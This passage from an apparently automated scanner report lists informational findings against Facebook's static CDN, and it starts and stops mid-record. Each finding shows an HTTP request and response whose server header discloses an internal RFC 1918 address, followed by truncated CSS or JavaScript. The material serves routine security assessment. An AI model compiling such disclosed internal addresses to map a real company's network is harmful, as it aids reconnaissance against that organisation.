div#pagelet_app_stories.loading .loadingIndicator{display:block}
#pagelet_games_header .uiHeaderPage
...[SNIP]...

24.108. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/heGhkAidtX0.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/heGhkAidtX0.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:35:21 GMT
X-FB-Server: 10.30.145.199
X-Cnection: close
Content-Length: 7368
Vary: Accept-Encoding
Cache-Control: public, max-age=30424615
Expires: Thu, 05 Jul 2012 18:15:40 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1309976210,169775559*/

#address_book_selector .uiHeaderPage{padding-bottom:0}
#address_book_selector .instructions{font-size: 13px}
#address_book_selector h2{font-size: 16px}
#all_or_some_selector{
...[SNIP]...

24.109. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/msTi-EL7vCK.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/msTi-EL7vCK.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 19:10:05 GMT
X-FB-Server: 10.138.64.185
Content-Length: 1749
Vary: Accept-Encoding
Cache-Control: public, max-age=29064935
Expires: Wed, 20 Jun 2012 00:34:17 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1308616380,176832697*/

.actionspro .actionspro_li{border-bottom:1px solid #d8dfea}
.actionspro .actionspro_a{background:transparent;display:block;margin:0;padding:2px 3px;text-decoration:none}
.act
...[SNIP]...

24.110. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/otNsMnT3Ccb.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/otNsMnT3Ccb.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:23:31 GMT
X-FB-Server: 10.30.147.194
X-Cnection: close
Content-Length: 6587
Vary: Accept-Encoding
Cache-Control: public, max-age=29018137
Expires: Tue, 19 Jun 2012 11:34:20 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1308569759,169776066*/

div.activation_actions_box{background:#fff9d7 none repeat scroll 0 0;margin-bottom:20px;padding:4px 0 12px 0}
div.activation_actions_box a:hover{background-color:#3b5998;colo
...[SNIP]...

24.111. http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/aZS2cs-mE5h.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yp/r/aZS2cs-mE5h.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yp/r/aZS2cs-mE5h.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 14 Jul 2011 01:19:05 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 9439
Vary: Accept-Encoding
Cache-Control: public, max-age=31059494
Expires: Fri, 13 Jul 2012 02:36:11 GMT
Date: Tue, 19 Jul 2011 14:57:57 GMT
Connection: close

/*1310611024,169776321*/

.fbPhotosTheaterActions a{display:block;margin-bottom:5px}
.fbUndoSpamReport a.fbUndoSpam{display:inline;margin-bottom:0}
.fbPhotosTheaterActionsTag .taggingOn,
.taggingMode
...[SNIP]...

24.112. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/kYoCeJwtttA.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yq/r/kYoCeJwtttA.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yq/r/kYoCeJwtttA.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 08 Jul 2011 21:31:25 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Content-Length: 2583
Vary: Accept-Encoding
Cache-Control: public, max-age=30810644
Expires: Tue, 10 Jul 2012 05:28:43 GMT
Date: Tue, 19 Jul 2011 14:57:59 GMT
Connection: close

/*1310362109,169775557*/

if (window.CavalryLogger) { CavalryLogger.start_js(["jxI8t"]); }

function HelpLandingController(a,c,b){copy_properties(this,{elem:a,name:c,isStatic:b});PageTransitions.regis
...[SNIP]...

24.113. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yr/r/Ci-JcEcsrg9.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yr/r/Ci-JcEcsrg9.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:23:17 GMT
X-FB-Server: 10.138.17.183
Content-Length: 32716
Vary: Accept-Encoding
Cache-Control: public, max-age=30423487
Expires: Thu, 05 Jul 2012 17:56:49 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1309975033,176820663*/

.sidebar{padding-right:176px;overflow:hidden;background:#fff url(http://static.ak.fbcdn.net/rsrc.php/v1/zg/r/YtYaQ6MmfqN.gif) repeat-y top right}
.sidebar.other_side{padding-
...[SNIP]...

24.114. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/LYx7X5wadgo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yr/r/LYx7X5wadgo.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yr/r/LYx7X5wadgo.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:23:42 GMT
X-FB-Server: 10.138.16.181
Content-Length: 4885
Vary: Accept-Encoding
Cache-Control: public, max-age=25357644
Expires: Tue, 08 May 2012 02:44:56 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1304909021,176820405*/

if (window.CavalryLogger) { CavalryLogger.start_js(["VNmWL"]); }

function startMessagingNavCountUpdater(g){var d=DOM.scry($('sideNav'),'.key-inbox')[0];if(!d)return;var c=DO
...[SNIP]...

24.115. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ys/r/NoGBEHOl3Wf.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ys/r/NoGBEHOl3Wf.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:59:35 GMT
X-FB-Server: 10.30.147.197
X-Cnection: close
Content-Length: 1738
Vary: Accept-Encoding
Cache-Control: public, max-age=23666131
Expires: Wed, 18 Apr 2012 12:53:01 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1303217638,169776069*/

.MobileMMSEmailSplash_Container{font-size: 12px;color:#444}
.MobileMMSEmailSplash_Left{float:left;font-size: 13px;padding:5px;width:375px}
.MobileMMSEmailSplash_Pic{width:350
...[SNIP]...

24.116. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/PCqjbIZdno-.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ys/r/PCqjbIZdno-.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ys/r/PCqjbIZdno-.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/directory/people/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:08 GMT
X-FB-Server: 10.138.17.186
Content-Length: 1540
Vary: Accept-Encoding
Cache-Control: public, max-age=23631423
Expires: Wed, 18 Apr 2012 03:14:39 GMT
Date: Tue, 19 Jul 2011 14:57:36 GMT
Connection: close

/*1303182882,176820666*/

.tabs{padding:0;border-bottom:1px solid #898989}
.ff2 .tabs{padding:3px 0}
.tabs.top{background:#f7f7f7}
.tabs .left_tabs{padding-left:10px;float:left}
.tabs .right_tabs{padd
...[SNIP]...

24.117. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/ys/r/qirUjHNG9oJ.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/ys/r/qirUjHNG9oJ.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 22 Jun 2011 21:51:39 GMT
X-FB-Server: 10.138.17.185
Content-Length: 4537
Vary: Accept-Encoding
Cache-Control: public, max-age=29595224
Expires: Tue, 26 Jun 2012 03:52:27 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309146667,176820665*/

.confirmation_login_content{margin:15px auto;line-height:15px;width:420px}
.tos_portion{color:#808080;font-size: 9px;margin:10px auto;padding:4px 0;border-top:solid 1px #ccc}
...[SNIP]...

24.118. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/0xUg4sx8bB2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yt/r/0xUg4sx8bB2.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yt/r/0xUg4sx8bB2.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 21:01:08 GMT
X-FB-Server: 10.138.64.183
Content-Length: 12497
Vary: Accept-Encoding
Cache-Control: public, max-age=31040129
Expires: Thu, 12 Jul 2012 21:13:25 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1310591554,176832695*/

if (window.CavalryLogger) { CavalryLogger.start_js(["8N4Xd"]); }

var ChatUserInfos=window.ChatUserInfos||{};
var FriendLists=window.FriendLists||{get:function(a){var b=Frien
...[SNIP]...

24.119. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/OVLmRskybHj.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yt/r/OVLmRskybHj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yt/r/OVLmRskybHj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/pages/create.php?ref_type=sitefooter
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.30.146.199
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 492
Cache-Control: public, max-age=30234535
Expires: Tue, 03 Jul 2012 13:26:43 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1309785932,169775815*/

.sp_4a6jac{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/deIrY85PE2v.png);background-repeat:no-repeat;display:inline-block;height:110px;width:110px}
.sx_bf
...[SNIP]...

24.120. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/gdzYpes5-k7.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yt/r/gdzYpes5-k7.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yt/r/gdzYpes5-k7.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Fri, 15 Jul 2011 22:52:15 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 48915
Vary: Accept-Encoding
Cache-Control: public, max-age=31219542
Expires: Sat, 14 Jul 2012 23:03:38 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1310770982,169776317*/

if (window.CavalryLogger) { CavalryLogger.start_js(["3cuzy"]); }

function AsyncLayout(){}AsyncLayout.prototype={init:function(b,a,c,d){this.canvas_id=b.id;if(a)this.auxiliar
...[SNIP]...

24.121. http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yu/r/7f4SE3bv4B2.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yu/r/7f4SE3bv4B2.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:35:01 GMT
X-FB-Server: 10.138.69.183
Vary: Accept-Encoding
Content-Length: 347
Cache-Control: public, max-age=30807654
Expires: Tue, 10 Jul 2012 04:39:39 GMT
Date: Tue, 19 Jul 2011 14:58:45 GMT
Connection: close

/*1310359293,176833975*/

.fbQuestionsBlankState{text-align:center}
.questionsList{font-size: 11px}
.questionsList .authorSentence{padding:2px 0 0;font-size: 13px}
.questionsList .questionsListItem{pa
...[SNIP]...

24.122. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yv/r/SYIMzW6wi61.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yv/r/SYIMzW6wi61.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 23:36:25 GMT
X-FB-Server: 10.138.17.182
Content-Length: 1238
Vary: Accept-Encoding
Cache-Control: public, max-age=30878569
Expires: Wed, 11 Jul 2012 00:21:31 GMT
Date: Tue, 19 Jul 2011 14:58:42 GMT
Connection: close

/*1310430068,176820662*/

.groupMember{width:230px;float:left}
.groupProfileHeader{margin-top:5px;padding-bottom:5px}
.groupProfileHeaderContent{margin-bottom:2px;margin-top:-2px;position:relative;z-i
...[SNIP]...

24.123. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yv/r/bDUZuV99E60.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yv/r/bDUZuV99E60.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:38 GMT
X-FB-Server: 10.30.145.197
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 651
Cache-Control: public, max-age=27434693
Expires: Fri, 01 Jun 2012 03:43:33 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1306986233,169775557*/

.data_archiver{border:1px solid #ccc;padding:45px;width:800px}
.data_archiver_logo{width:180px;height:180px}
h1.marketingHeadlineHuge{font-size: 28px}
h3.col_header{font-size
...[SNIP]...

24.124. http://static.ak.fbcdn.net/rsrc.php/v1/yw/r/KL99XeYC7AS.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yw/r/KL99XeYC7AS.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yw/r/KL99XeYC7AS.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/mobile/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Content-Length: 404
Cache-Control: public, max-age=30423950
Expires: Thu, 05 Jul 2012 18:03:20 GMT
Date: Tue, 19 Jul 2011 14:57:30 GMT
Connection: close

/*1309975362,176832697*/

.sp_b2am02{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zi/r/PbmUudSYZ0z.png);background-repeat:no-repeat;display:inline-block;height:101px;width:300px}
.sx_82
...[SNIP]...

24.125. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/clJdoaAA7xi.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yx/r/clJdoaAA7xi.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yx/r/clJdoaAA7xi.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sat, 11 Jun 2011 20:48:19 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 2318
Vary: Accept-Encoding
Cache-Control: public, max-age=28654358
Expires: Fri, 15 Jun 2012 06:30:32 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1308205843,169775556*/

if (window.CavalryLogger) { CavalryLogger.start_js(["EYUsQ"]); }

var ResourcePrefetcher={IDLE_TIME:20000,STATUS_UNFETCHED:0,STATUS_FETCHED_T1:100,STATUS_DONE:200,init:functi
...[SNIP]...

24.126. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yy/r/POIirpFgl5q.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yy/r/POIirpFgl5q.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:54:33 GMT
X-FB-Server: 10.30.147.196
X-Cnection: close
Content-Length: 2362
Vary: Accept-Encoding
Cache-Control: public, max-age=23675309
Expires: Wed, 18 Apr 2012 15:27:12 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1303226812,169776068*/

.page_browser_page_name_box{height:28px;text-align:center;width:90px}
.page_browser_pic_container{background-color:#8ca7e0;height:150px;position:relative;width:100px}
.page_b
...[SNIP]...

24.127. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yy/r/Trz9qEKGISz.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yy/r/Trz9qEKGISz.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:04 GMT
X-FB-Server: 10.138.17.185
Vary: Accept-Encoding
Content-Length: 336
Cache-Control: public, max-age=30231475
Expires: Tue, 03 Jul 2012 12:36:38 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309783009,176820665*/

.sp_2uu5k2{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zJ/r/ZsaRRxDPUYu.png);background-repeat:no-repeat;display:inline-block;height:15px;width:29px}
.sx_7e1c
...[SNIP]...

24.128. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yz/r/5fFMnagjg2S.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yz/r/5fFMnagjg2S.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
